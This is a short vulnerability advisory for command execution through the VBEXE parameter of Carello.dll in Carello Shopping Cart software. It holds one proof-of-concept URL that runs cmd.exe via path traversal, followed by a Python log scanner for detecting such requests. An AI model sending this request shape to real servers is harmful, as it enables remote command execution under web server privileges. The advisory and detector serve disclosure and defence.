Vendor: Carello Shopping Cart Software
Product Name: Carello Shopping Cart Software
Vulnerability: Arbitrary Command Execution
CVSS: 7.5 (HIGH)

Arbitrary Command Execution in Carello Shopping Cart Software

A remote user can execute arbitrary commands on a host running Carello Shopping Cart software. A specially crafted HTTP request to Carello.dll can cause the inetinfo.exe process to consume all available system resources, so that it refuses new connections. If the request names an executable in its VBEXE parameter, that executable is run with the privileges of the web server.


Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2729/info


http://foo.org/scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20echo%20test>c:\defcom.txt
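A defender-side detector for the request shape shown above, added here as an example and not part of the original advisory: it scans IIS W3C-style log lines (date, time, client IP, method, URI stem, URI query, status; assumed field order) for Carello.dll requests whose VBEXE parameter traverses directories or names a Windows executable, decoding percent-encoding first so encoded variants are caught. The log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed IIS W3C-style log lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# The first and last lines mimic the request shape in this advisory; the others are benign.
SAMPLE_LOG = "\n".join([
    r"2001-05-14 10:01:02 192.0.2.10 GET /scripts/Carello/Carello.dll CARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20echo%20test>c:\defcom.txt 200",
    r"2001-05-14 10:01:05 192.0.2.11 GET /scripts/Carello/Carello.dll CARELLOCODE=SITE2 200",
    r"2001-05-14 10:01:09 192.0.2.12 GET /index.html - 200",
    r"2001-05-14 10:01:12 192.0.2.13 GET /scripts/Carello/Carello.dll CARELLOCODE=SITE2&VBEXE=%2e%2e%5cwinnt%5csystem32%5ccmd.exe 500",
])

# ".." as a whole path component (either separator), and a Windows executable extension.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
EXECUTABLE = re.compile(r"\.(exe|com|bat|cmd)(\s|$|[\\/])", re.IGNORECASE)


def is_suspicious_vbexe(query: str) -> bool:
    """True if the VBEXE parameter traverses directories or names an executable."""
    params = parse_qs(query, keep_blank_values=True)  # decodes one layer of %xx
    for value in params.get("VBEXE", []):
        value = unquote(value)  # strip a second encoding layer, if present
        if TRAVERSAL.search(value) or EXECUTABLE.search(value):
            return True
    return False


def scan_iis_log(log_text: str) -> list:
    """Return one record per Carello.dll request whose VBEXE value looks abusive."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7 or not fields[4].lower().endswith("/carello.dll"):
            continue
        if is_suspicious_vbexe(fields[5]):
            hits.append({"ip": fields[2], "status": fields[6], "query": unquote(fields[5])})
    return hits


if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```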